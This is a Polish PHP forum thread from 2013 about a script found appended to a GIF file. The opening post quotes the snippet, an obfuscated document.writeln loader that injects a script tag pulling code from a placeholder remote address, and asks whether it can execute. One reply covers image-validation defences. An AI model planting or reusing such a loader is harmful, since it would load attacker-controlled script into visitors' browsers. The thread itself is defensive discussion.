Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> javascript w obrazku
sazian
post
Post #1





Grupa: Zarejestrowani
Postów: 1 045
Pomógł: 141
Dołączył: 19.09.2006
Skąd: B-tów

Ostrzeżenie: (0%)
-----

Witam,
ostatnio puściłem skan w poszukiwaniu frazy document.write i ku mojemu zdziwieniu znalazło to w pliku gif (IMG:style_emoticons/default/smile.gif)
dokładniej wygląda to tak - jest to doklejone na końcu obrazka
[HTML] pobierz, plaintext 
  1. <script type="text/javascript"><!--
  2. document.writeln('<'+'scr'+'ipt type="text/javascript" src="tu adres do jakiejś strony"></'+'scr'+'ipt>');
  3. //--></script>
[HTML] pobierz, plaintext



zacząłem z tym trochę kombinować i owszem da się dopisać dowolny kod bez uszkadzania pliku ale nie daje się on uruchomić.
Jakie warunki trzeba spełnić aby taki kod został uruchomiony (IMG:style_emoticons/default/questionmark.gif) czy daje się on w ogóle uruchomić (IMG:style_emoticons/default/questionmark.gif)

Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
Pilsener
post
Post #2





Grupa: Zarejestrowani
Postów: 1 590
Pomógł: 185
Dołączył: 19.04.2006
Skąd: Gdańsk

Ostrzeżenie: (0%)
-----

Żeby sprawdzić mechanizmy bezpieczeństwa choćby. Kiedyś polecany i popularny był sposób, by wczytać kilka pierwszych i ostatnich bajtów pliku. Dziś już nie trzeba tego robić bo są dedykowane maszyny tylko pod obrazki i specjalne biblioteki do sprawdzania plików, zwłaszcza obrazków. Byle lamer nie złamie. Poza tym nigdy nie mów nigdy, w tym wypadku akurat się nie wykona ale może ktoś chce to połączyć np. z awarią serwera? To tak jak kod PHP teoretycznie nigdy nie powinien być widoczny na stronie a w praktyce wiele razy już to widziałem.
Go to the top of the page
+Quote Post

Posty w temacie
- sazian   javascript w obrazku   11.02.2013, 22:30:35
- - thek   Daje się... Jest to "test" przetwarzania...   11.02.2013, 22:44:14
- - sazian   ok tylko z tego co tak na szybko przejrzałem to ta...   11.02.2013, 23:28:00
- - nospor   Obrazki/zasoby/pliki można zwracać nie bezpośredni...   12.02.2013, 15:20:02
- - sazian   no niestety nie próbowałem z file_get_contents i ...   12.02.2013, 17:34:57
- - ano   Czemu niby skrypt JS miałby się wykonać? Jeżeli na...   12.02.2013, 19:45:50
- - sazian   ok tylko poco ktoś by dodawał taki kod skoro i tak...   12.02.2013, 20:35:46
- - Pawel_W   może ktoś chciał Ci zawirusować serwer i zamiast d...   12.02.2013, 20:55:22
- - Pilsener   Żeby sprawdzić mechanizmy bezpieczeństwa choćby. K...   12.02.2013, 23:07:05
- - nospor   CytatCzemu niby skrypt JS miałby się wykonać? Jeże...   13.02.2013, 09:20:19
|- - ano   Cytat(nospor @ 13.02.2013, 09:20:19 )...   14.02.2013, 22:42:40
- - nospor   1) A czy ja powiedziałem ze się wywala? Czasami po...   14.02.2013, 22:58:43
- - ano   http://blogs.msdn.com/b/ieinternals/archiv...ttp-h...   15.02.2013, 00:18:36
- - nospor   Strach się bać, jak on już takie kody: Kod<scr...   15.02.2013, 08:47:10
- - pyro   Cytat(nospor @ 13.02.2013, 09:20:19 )...   15.02.2013, 10:05:10
- - nospor   1) A mi się zdarzało i dośc czesto 2) Tak, tylko ...   15.02.2013, 10:11:53
|- - pyro   Cytat(nospor @ 15.02.2013, 10:11:53 )...   15.02.2013, 10:13:43
- - nospor   Kod js się nie wykonywał, bo wówczas miałem normal...   15.02.2013, 10:16:29
|- - pyro   Cytat(nospor @ 15.02.2013, 10:16:29 )...   15.02.2013, 10:17:52
- - nospor   Dawaj. Chętnie zobaczę jak to zrobisz   15.02.2013, 10:20:28
|- - pyro   Cytat(nospor @ 15.02.2013, 10:20:28 )...   15.02.2013, 11:10:53
- - nospor   Powtarzam pytanie autora: po co ktoś wkłada js w o...   15.02.2013, 11:13:26
- - pyro   No to jakiś przykład?   15.02.2013, 11:14:31
- - nospor   Przykład podałem: pijany programista dający złe na...   15.02.2013, 11:17:08
|- - pyro   Cytat(nospor @ 15.02.2013, 11:17:08 )...   15.02.2013, 11:19:02
- - nospor   Ale możliwe. Odpowiedź na pytanie udzielona. Jakiś...   15.02.2013, 11:20:50
- - viking   Z tego co pamiętam kod taki był w stanie się wykon...   15.02.2013, 13:55:56
- - nospor   Cytatbył w stanie się wykonać w konkretnych, stars...   15.02.2013, 13:59:29
- - Łukasz Piotr Łuczak   Co po niektórych z tego wątku nie spodziewałbym si...   15.02.2013, 15:11:50
|- - pyro   Cytat(Łukasz Piotr Łuczak @ 15.02.2013, 15...   15.02.2013, 23:24:27
|- - redeemer   Widzę panowie, że zaczynacie się lekko "spina...   16.02.2013, 01:49:42
|- - sazian   Cytat(redeemer @ 16.02.2013, 01:49:42...   16.02.2013, 12:30:21
|- - redeemer   Cytat(sazian @ 16.02.2013, 12:30:21 )...   16.02.2013, 12:46:13
- - nospor   Cytat2) wykorzystujemy inny błąd (np. przy komenta...   15.02.2013, 15:21:40
- - Damonsson   Specjalnie się zarejestrowałeś, żeby napisać, że j...   15.02.2013, 15:28:27
- - Łukasz Piotr Łuczak   nospor: nie doczytałeś stwierdzenia "Przykład...   15.02.2013, 16:28:43
- - sazian   dobra może podam trochę więcej szczegółów ten obra...   15.02.2013, 20:28:45
- - sazian   wróć mój błąd tyle już z tym plikiem kombinowałem...   16.02.2013, 12:55:31

« Następny starszy · Hydepark · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 5.10.2025 - 13:39
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn